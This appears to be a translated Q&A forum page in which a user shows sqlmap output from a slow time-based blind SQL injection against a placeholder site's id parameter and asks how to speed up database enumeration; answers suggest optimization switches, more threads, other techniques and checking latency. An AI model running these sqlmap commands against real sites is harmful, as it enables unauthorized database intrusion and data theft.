这是一个例子。只是试图列出数据库:
python sqlmap.py -u "http://somesite.com/?id=1" --dbs
[15:20:32] [INFO] fetching database names
[15:20:32] [INFO] fetching number of databases
[15:20:32] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:20:39] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
2
[15:20:55] [INFO] adjusting time delay to 2 seconds due to good response times
2
[15:20:58] [INFO] retrieved: 100_MYDB
[15:22:39] [INFO] retrieved: DEV_GC_DATASTORAGE
[15:26:15] [INFO] retrieved: GC_
您可以在时间戳中看到列出1个数据库名称大约需要3分钟,它逐个字符,每个字符需要大约7秒。我在youtube上看过的教程是超快的...... 我该怎么做才能加快速度呢?我试过搞乱.conf
感谢。
答案 0 :(得分:2)
您还可以使用-o开关进行某些优化。还可以尝试--technique = BEUS
答案 1 :(得分:1)
somesite.com的网络延迟是多少?您可以通过ping somesite.com来检查这一点。如果延迟很高,那么当您通过char测试char时,执行盲SQL注入会很慢。 - rgerganov 7月4日19:43
答案 2 :(得分:1)
使用更多主题。默认值为1:
--threads=THREADS
Max number of concurrent HTTP(s) requests (default 1)
答案 3 :(得分:0)
您可以像这样使用快速响应。 sqlmap -u“http://somesite.com/?id=1” - time-sec 15